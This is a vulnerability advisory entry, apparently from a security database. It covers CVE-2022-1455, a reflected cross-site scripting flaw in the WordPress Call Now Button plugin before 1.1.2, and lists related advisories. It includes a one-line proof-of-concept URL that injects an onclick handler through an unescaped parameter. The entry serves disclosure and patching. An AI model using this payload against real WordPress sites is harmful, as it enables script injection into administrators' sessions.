Lucene search
7cooWPVDB-ID:8267046E-870E-4CCD-B920-340233ED3B93HistoryApr 25, 2022 - 12:00 a.m.
Call Now Button < 1.1.2 - Reflected Cross-Site Scripting
2022-04-2500:00:00
7coo
wpscan.com
11
0.001 Low
EPSS
Percentile
40.3%
The plugin does not escape a parameter before outputting it back in an attribute of a hidden input, leading to a Reflected Cross-Site Scripting when the premium is enabled
PoC
With premium enabled: http://example.com/wp-admin/admin.php?page=call-now-button&bid;=xxxxx" accesskey=X onclick=alert(/XSS/) test="
| CPE | Name | Operator | Version |
|---|---|---|---|
| call-now-button | lt | 1.1.2 |
Related
patchstack
patchstack
wpexploit
wpexploit
Call Now Button < 1.1.2 - Reflected Cross-Site Scripting
2022-04-25 00:00:00
prion
prion
Cross site scripting
2022-05-16 15:15:00
cnvd
cnvd
WordPress Call Now Buttons plugin跨站脚本漏洞
2022-05-18 00:00:00
openvas
openvas
WordPress Call Now Button Plugin < 1.1.2 XSS Vulnerability
2023-10-04 00:00:00
cvelist
cvelist
CVE-2022-1455 Call Now Button < 1.1.2 - Reflected Cross-Site Scripting
2022-05-16 14:31:07
nvd
nvd
CVE-2022-1455
2022-05-16 15:15:09
cve
cve
CVE-2022-1455
2022-05-16 15:15:09